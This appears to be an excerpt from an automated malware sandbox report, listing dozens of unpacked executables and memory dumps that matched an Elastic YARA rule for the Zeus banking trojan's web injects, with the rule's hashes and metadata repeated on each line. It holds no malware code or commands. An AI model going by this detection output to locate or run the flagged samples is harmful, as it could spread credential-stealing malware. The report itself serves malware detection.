Source: 2.3.svchost.exe.b00000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7081e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.48.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.55.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809572996.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2784640433.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2575291599.000000000F380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2612530811.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2544138671.000000000D580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775654849.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2587965689.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2793511340.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763018604.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2754985393.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
